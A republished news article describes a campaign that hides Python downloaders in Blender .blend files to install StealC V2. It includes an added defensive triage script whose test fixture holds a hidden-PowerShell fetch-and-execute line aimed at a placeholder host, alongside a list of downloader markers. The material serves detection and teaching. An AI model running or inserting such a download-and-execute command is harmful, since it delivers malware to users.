Ptechhub
Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware

The Hacker News, November 25, 2025


Nov 25, 2025Ravie LakshmananMalware / Browser Security

Cybersecurity researchers have disclosed details of a new campaign that has leveraged Blender Foundation files to deliver an information stealer known as StealC V2.

“This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader,” Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News.

“Users unknowingly download these 3D model files, which are designed to execute embedded Python scripts upon opening in Blender — a free, open-source 3D creation suite.”


The cybersecurity company said the activity shares similarities with a prior campaign linked to Russian-speaking threat actors that involved impersonating the Electronic Frontier Foundation (EFF) to target the online gaming community and infect them with StealC and Pyramid C2.

This assessment is based on tactical similarities in both campaigns, including using decoy documents, evasive techniques, and background execution of malware.

The latest attacks abuse Blender's ability to embed Python scripts in .blend files, a feature commonly used to ship the UI panels of character rigs alongside the model. When the Auto Run Python Scripts preference is enabled, those embedded scripts execute automatically as soon as the file is opened, which amounts to arbitrary Python execution with the privileges of the user running Blender.

The security risk has been acknowledged by Blender in its own documentation, which states: “The ability to include Python scripts within blend-files is valuable for advanced tasks such as rigging and automation. However, it poses a security risk since Python does not restrict what a script can do.”

The attack chain begins with malicious .blend files uploaded to free 3D asset sites such as CGTrader. Each file carries an embedded script named “Rig_Ui.py” that runs as soon as the file is opened in Blender with Auto Run enabled. That script fetches a PowerShell script, which in turn downloads two ZIP archives.
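The chain above turns on a question a defender can answer without ever opening the file in Blender: does this .blend carry embedded text datablocks, and does their content look like a downloader? The triage script below is an added example, not code from Morphisec, Blender or the campaign. It walks Blender's file-block table (a 12-byte header, then blocks of code, size, old address, SDNA index and count), groups each Text datablock (block code TX) with the DATA blocks that hold its lines, and greps the result for downloader-style markers. The marker list, the `build_sample_blend` fixture and both embedded scripts are constructed for the example; the fixture is not a loadable Blender file, and the `TX`-prefixed name scan is a version-agnostic heuristic rather than a parse of the ID struct.

```python
"""Offline triage of an uncompressed .blend file: walk Blender's file-block
table, pull out every embedded Text datablock (code b"TX\x00\x00") and flag
downloader-style content. Pure Python, no bpy; nothing in the file is run."""
import struct

# Heuristic markers for a downloader stage hiding in a "rig UI" script (constructed list).
SUSPICIOUS_MARKERS = (b"powershell", b"subprocess", b"urllib", b"urlopen", b"requests",
                      b"base64", b"os.system", b"exec(", b"__import__", b"http://", b"https://")
ZSTD_MAGIC, GZIP_MAGIC = b"\x28\xb5\x2f\xfd", b"\x1f\x8b"


def is_compressed(data: bytes) -> bool:
    """Blender 3.0+ saves with zstd when 'Compress' is on; older files used gzip."""
    return data.startswith(ZSTD_MAGIC) or data.startswith(GZIP_MAGIC)


def parse_header(data: bytes):
    """12-byte header: 'BLENDER', pointer size ('_'=4, '-'=8), endian ('v'/'V'), version."""
    if is_compressed(data):
        raise ValueError("compressed .blend: decompress (zstd/gzip) before scanning")
    if len(data) < 12 or data[:7] != b"BLENDER":
        raise ValueError("not a .blend file header")
    ptr_size = {b"_": 4, b"-": 8}.get(data[7:8])
    if ptr_size is None or data[8:9] not in (b"v", b"V"):
        raise ValueError("malformed pointer-size or endianness byte")
    return ptr_size, data[8:9] == b"v", data[9:12].decode("ascii")


def iter_blocks(data: bytes):
    """Yield (code, payload) per block. Header: code[4] size[u32] old_addr[ptr] sdna[u32] count[u32]."""
    ptr_size, little, _version = parse_header(data)
    fmt = ("<" if little else ">") + "4sI" + ("Q" if ptr_size == 8 else "I") + "II"
    hdr_len, off = struct.calcsize(fmt), 12
    while off + hdr_len <= len(data):
        code, size, _old, _sdna, _count = struct.unpack_from(fmt, data, off)
        off += hdr_len
        payload = data[off:off + size]
        if len(payload) != size:
            raise ValueError("truncated block %r at offset %d" % (code, off))
        yield code, payload
        off += size
        if code == b"ENDB":
            return
    raise ValueError("no ENDB terminator: truncated file or not a .blend")


def id_name(tx_payload: bytes):
    """Best effort: the ID name is NUL-terminated and prefixed 'TX'; its offset
    inside the ID struct differs between Blender versions, so scan for it."""
    i = tx_payload.find(b"TX")
    while i != -1:
        end = tx_payload.find(b"\x00", i)
        cand = tx_payload[i + 2:end if end != -1 else None]
        if cand and all(32 <= c < 127 for c in cand):
            return cand.decode("ascii")
        i = tx_payload.find(b"TX", i + 1)
    return None


def find_text_blocks(data: bytes):
    """A TX block is followed by DATA blocks holding its TextLine structs and the
    line characters; any other block code ends that run."""
    texts, current = [], None
    for code, payload in iter_blocks(data):
        if code == b"TX\x00\x00":
            current = {"name": id_name(payload), "raw": bytearray()}
            texts.append(current)
        elif code == b"DATA" and current is not None:
            current["raw"] += payload
        else:
            current = None
    return texts


def triage(data: bytes):
    """One finding per embedded text block: name, raw size and the markers that hit."""
    return [{"name": t["name"], "bytes": len(t["raw"]),
             "markers": sorted(m.decode() for m in SUSPICIOUS_MARKERS if m in t["raw"])}
            for t in find_text_blocks(data)]


def build_sample_blend(script: bytes, name: bytes = b"Rig_Ui.py") -> bytes:
    """CONSTRUCTED fixture: a minimal little-endian 64-bit block table that exercises
    the walker. Not a loadable Blender file (no DNA1 block; placeholder structs)."""
    def block(code, payload):
        return struct.pack("<4sIQII", code, len(payload), 0, 0, 1) + payload
    body = block(b"TX\x00\x00", b"\x00" * 40 + b"TX" + name + b"\x00")  # stand-in ID struct
    for line in script.split(b"\n"):
        body += block(b"DATA", b"\x00" * 32)    # stand-in TextLine struct
        body += block(b"DATA", line + b"\x00")  # the line's characters
    return b"BLENDER-v405" + body + block(b"ENDB", b"")


# Constructed stand-ins, not the scripts from the campaign.
BENIGN_RIG_UI = b"import bpy\nclass RIG_PT_ui(bpy.types.Panel):\n    bl_label = 'Rig UI'\n"
DOWNLOADER_LIKE = (b"import subprocess\nsubprocess.Popen(['powershell', '-w', 'hidden', '-c',"
                   b" 'iwr https://placeholder.invalid/stage.ps1 | iex'])\n")

if __name__ == "__main__":
    for label, script in (("benign", BENIGN_RIG_UI), ("downloader-like", DOWNLOADER_LIKE)):
        print(label, triage(build_sample_blend(script)))
```

Against a real file, call `triage(open(path, "rb").read())` after decompressing a zstd or gzip save. A hit means the file deserves a look in Blender started with `--disable-autoexec`, which overrides the Auto Run preference for that session; the preference itself lives under Edit > Preferences > Save & Load > Auto Run Python Scripts and is off by default, which is why the campaign depends on users who have switched it on for rig UIs. That switch gates both registered text blocks and Python driver expressions; the scan above shows what the text blocks contain, not which of them are flagged to register, since that needs the SDNA-resolved Text struct.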


While one of the ZIP files contains a payload for StealC V2, the second archive deploys a secondary Python-based stealer on the compromised host. The updated version of StealC, first announced in late April 2025, supports a wide range of information gathering features, allowing data to be extracted from 23 browsers, 100 web plugins and extensions, 15 cryptocurrency wallet apps, messaging services, VPNs, and email clients.

“Keep Auto Run disabled unless the file source is trusted,” Morphisec said. “Attackers exploit Blender, which typically runs on physical machines with GPUs, bypassing sandboxes and virtual environments.”





PTechHub

A tech news platform delivering fresh perspectives, critical insights, and in-depth reporting — beyond the buzz. We cover innovation, policy, and digital culture with clarity, independence, and a sharp editorial edge.

Copyright © 2025 | Powered By Porpholio